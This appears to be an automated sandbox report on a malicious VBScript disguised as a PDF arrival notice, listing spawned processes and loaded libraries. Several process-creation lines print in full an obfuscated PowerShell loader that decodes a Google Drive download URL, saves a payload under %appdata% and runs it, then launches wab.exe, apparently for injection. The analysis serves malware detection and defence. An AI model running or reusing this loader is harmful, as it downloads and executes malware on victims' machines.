            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Arrival Notice PUS_pdf.vbsReversingLabs: Detection: 13%
            Source: Arrival Notice PUS_pdf.vbsVirustotal: Detection: 15%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
